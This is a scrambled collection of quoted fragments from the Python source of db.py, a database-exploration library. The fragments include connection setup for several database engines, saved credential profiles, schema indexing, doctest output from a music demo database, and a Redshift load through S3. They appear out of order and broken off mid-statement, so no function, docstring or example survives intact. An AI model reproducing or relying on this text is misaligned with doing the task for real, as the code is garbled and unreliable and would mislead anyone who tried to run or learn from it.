sql is None: continue for (column_name, foreign_table,", "db_dict def list_profiles(): \"\"\" Lists all of the database profiles available Examples --------", "len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock", "1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select *", "None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\":", "raise Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql, mssql,", "region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\")", "= self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta", "self._try_command(sql) # generate schema from pandas and then adapt for redshift sql =", "| NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType |", "db = DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB() >>>", "Exception(\"Couldn't find boto library. Please ensure it is installed\") if s3 is not", "About To Rock We Salute You 9 For Those About To Rock We", "keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = []", "pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the table metadata for", "same order, making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+", "\"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate", "DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\")", "comes time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0}", "to query the system tables. limit: int, None Default number of records to", "try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False", "= DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None,", "arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\"", "INTEGER | | Invoice | CustomerId | INTEGER | | Invoice | BillingAddress", "[] tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")]", "... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data) table_name cnt 0 Album 347", "hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db =", "| Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name |", "'{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your", "len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY,", "profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port", "Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is installed\")", "sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\",", "table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\")", "Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice", "DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For", "from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns)", "sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname: str Name", ">>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>>", "self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if", "database=self.dbname or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User", "a second...\") rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select name", "= ''' ... SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }}", "as list of tuples, to match how normal loading is performed for col", "import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try:", "{limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q = \"select top", "tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in", "except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname", "port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con", "2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719", "DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\")", "= \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif", "server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif", "the Wall 2 2 3 Restless and Wild 2 3 4 Let There", "About To Rock We Salute You Name UnitPrice 0 For Those About To", "INTEGER | | Employee | Address | NVARCHAR(70) | | Genre | GenreId", "or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users", "database schemas: list List of schemas to include. Defaults to all. profile: str", "Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2", "0.99 3 Restless and Wild 0.99 4 Princess of the Dawn 0.99 5", "= cache if dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile)", "in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn", "= pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3", "gzip try: from StringIO import StringIO # Python 2.7 except: from io import", "= load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port =", "elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con =", "them in script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e.", "is None, the function will try and grab AWS_SECRET_KEY from your environment variables", "<NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1", "port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port", "everything \"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table)", "DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db =", "data_type = [data_type] cols = [] for table in self.tables: for col in", "-------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from", "'' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username,", "glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in", "schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\":", "3503 db.query(q, limit=10) Title \\ 0 For Those About To Rock We Salute", "database. Parameters ---------- username: str Your username for the database password: str Your", "doing it one time, database-wide, if query is available elif not use_cache and", "# Three modes for refreshing schema # 1. load directly from cache #", "s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV", "for how you like your queries exclude_system_tables: bool Whether or not to include", "0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE>", "Wall 2 Restless and Wild 3 Restless and Wild 4 Restless and Wild", "querying a database. Parameters ---------- username: str Your username for the database password:", "| | Customer | SupportRepId | INTEGER | | Customer | CustomerId |", "<NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider", "< (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query", "[] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd):", "wait...\") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \\", "database libraries # TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG", "| | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns", "3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561", "location in which to create the temporary transfer s3 bucket. This should match", "you like your queries exclude_system_tables: bool Whether or not to include \"system\" tables", "Invoice | InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER |", "search, data_type=None): \"\"\" Aggresively search through your database's schema for a column. Parameters", "dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port =", "self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our", "(table_schema, table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name] =", "installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL:", "DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None,", "dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\")", "5 Put The Finger On You 0.99 6 Let's Get It Up 0.99", "columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name |", "Track | Milliseconds | INTEGER | | Track | GenreId | INTEGER |", "4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662", "MediaType | Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) |", "limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least ones", "your database's schema for a column. Parameters ----------- search: str glob pattern for", "= creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\")", "of the database schemas: list List of schemas to include. Defaults to all.", "FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table", "if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q", "Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out =", "On You 1 1 6 7 Let's Get It Up 1 1 7", "is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is", "| | Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress |", "drop the table if it already exists chunk_size: int (10000) Number of DataFrame", "for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and", "self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname self.port =", "stop your little sister from stealing your passwords. Parameters ---------- profile: str (optional)", "+--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name", "schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system']", "environment variables AWS_SECRET_KEY: str your aws secrety key. if this is None, the", "list List of schemas to include. Defaults to all. profile: str Preconfigured database", "| TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER | |", "| NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an", "= pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need to convert it", "table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in relationship tuple", "cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table", "D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>,", ">>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results", "exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out column metadata", "pymssql libraries. Please ensure one of them is installed\") if HAS_ODBC: base_con =", "load directly from cache # 2. use a single query for getting all", "= creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype =", "database (i.e. \"dw\", \"prod\") from db import DB import pymysql db = DB(username=\"hank\",", "self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise", "will return any handlebars queries as a single data frame. limit: int Number", "function argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this", "rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue", "\"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur =", "t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track t ...", "use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load", "f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile)", "grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key. if", "| Playlist | Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200)", "def to_dict(self): \"\"\"Dict representation of the database as credentials plus tables dict representation.\"\"\"", "and Wild 4 Restless and Wild 5 For Those About To Rock We", "t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],", "reference keys. This is used to control the rendering of PrettyTable a bit.", "Venom 1 1 8 9 Snowballed 1 1 9 10 Evil Walks 1", "your queries exclude_system_tables: bool Whether or not to include \"system\" tables (the ones", "threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE", "so it'll pick up # all of the data*.gz files we've created sys.stderr.write(\"Copying", "# Python 3.3+ import uuid import re import os import sys from collections", "Wild 2 3 4 Let There Be Rock 1 4 5 Big Ones", "# generate our Columns, and attach to each table to the table name", "data frame. limit: int Number of records to return Examples -------- >>> from", "column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like", "\\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] %", "'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432,", "10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock We Salute", "tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False", "if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif", "for the database hostname: str Hostname your database is running on (i.e. \"localhost\",", "EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here.", "\"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg", "one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\"", "chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn =", "We Salute You 9 For Those About To Rock We Salute You Name", "Table | Column Name | Type | +-----------+-------------+---------------+ | Artist | Name |", "refreshing schema # 1. load directly from cache # 2. use a single", "load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata']", "Ex: DW1.XL nodes have 2 slices per node, so if running 2 nodes", "is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into", "for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row", "= profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]]", "self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname", "Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) |", "column. Parameters ----------- search: str glob pattern for what you're looking for data_type:", "profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None,", "1 8 9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId", "\"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username')", "os.remove(f) except Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name,", "table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF", "343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W.", "(at least ones that fit into our framework), so we're going to create", "self.con.commit() # perform the \\COPY here. the s3 argument is a prefix, so", "1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0", "<NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994", "the database is running on. defaults to default port for db. portgres: 5432", "Lists all of the database profiles available Examples -------- No doctest, covered by", "1 1 7 8 Inject The Venom 1 1 8 9 Snowballed 1", "5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to", "To Rock We Salute You 8 For Those About To Rock We Salute", "file. This is not to say this a secure way to store sensitive", "| Address | NVARCHAR(70) | | Genre | GenreId | INTEGER | |", "are not in the same order, making doctest fail. db.find_column(\"Name\") # returns all", "INTEGER | | Employee | EmployeeId | INTEGER | | Genre | GenreId", "... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\",", "name }}' as table_name, ... COUNT(*) as cnt ... FROM ... {{ name", "returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type", "q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q =", "Those About To Rock We Salute You 7 For Those About To Rock", "save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to your db.py", "creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if", "0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99", "either function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None:", "= schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype", "how you like your queries exclude_system_tables: bool Whether or not to include \"system\"", "going to chunk the file into pieces. according to amazon, this is #", "to upload and COPY from S3. Upload speed is *much* faster if chunks", "INTEGER | | Track | GenreId | INTEGER | | Track | Bytes", "running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws", "db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20", "{\"name\": \"Track\"} ... ] >>> db.query(q, data=data) table_name cnt 0 Album 347 1", "= creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit =", "t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta =", "k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue())", "if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname,", "S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes", "Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = '''", "pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import", ">>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To", "dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\")", "exploring and querying a database. Parameters ---------- username: str Your username for the", "the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: #", "Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+", ". }} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ... '''", "HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect =", ">>> from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ |", "<NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>,", "foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert", "int (10000) Number of DataFrame chunks to upload and COPY from S3. Upload", "in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if", "}} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>>", "elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else:", "in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and", "INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice | CustomerId", "metadata for all tables as list of tuples if told to use cached", "base64 encoded JSON file. This is not to say this a secure way", "pybars from .column import Column, ColumnSet from .table import Table, TableSet from .s3", "Those About To Rock We Salute You Name UnitPrice 0 For Those About", "doesn't come with any metatables (at least ones that fit into our framework),", "glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through", "mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect =", "+----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee | Address |", "= s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the", "your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict())", "{{else}} ... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM ...", "data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q)", "limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q = \"select", "We Salute You 6 For Those About To Rock We Salute You 7", "come with any metatables (at least ones that fit into our framework), so", "Columns, and attach to each table to the table name in dict for", "NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId", "Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9", "creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas')", "adding limit={X} to the `query` method, or by passing an argument to `DB()`.", "# returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns", "bucket_location to default. # we can't do this in the function definition because", "generate our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates,", "u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com',", "# 1. load directly from cache # 2. use a single query for", "running on. defaults to default port for db. portgres: 5432 redshift: 5439 mysql:", "or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con =", "tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing", "tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) #", "filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is", "It Up 1 1 7 8 Inject The Venom 1 1 8 9", "Most of you probably don't need this, but if you're a db admin", "We Salute You 8 For Those About To Rock We Salute You 9", "db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those", "3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A.", "in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column)", "for (table_schema, table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name]", "Album | ArtistId | INTEGER | | Artist | ArtistId | INTEGER |", "indicates that there will be no limit (That's right, you'll be limitless. Bradley", "you're looking for data_type: str, list (optional) specify which data type(s) you want", "@last}} ... {{ . }} ... {{else}} ... {{ . }} , ...", "our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will", "if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache:", "= t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For", "through your database's schema for a table. Parameters ----------- search: str glob pattern", "if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port", "| Customer | CustomerId | INTEGER | | Employee | EmployeeId | INTEGER", "}} ... GROUP BY ... table_name ... ''' >>> data = [ ...", "print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing", "def remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\" user =", "table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and", "FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\)", "InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | | Invoice", "credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql:", "Genre | GenreId | INTEGER | | Invoice | InvoiceId | INTEGER |", "_gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach to each", "chunk_size: int (10000) Number of DataFrame chunks to upload and COPY from S3.", "trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables = [] for", "1 1 8 9 Snowballed 1 1 9 10 Evil Walks 1 1", "0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4", "type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2]))", "looking for Examples ---------- >>> from db import DemoDB >>> db = DemoDB()", "db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB()", "1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99", "self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load directly from cache", "import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns", "statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df =", "boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if", "data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ...", "like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create", "to the `query` method, or by passing an argument to `DB()`. None indicates", "INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ | Customer", "{limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True):", "= [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, 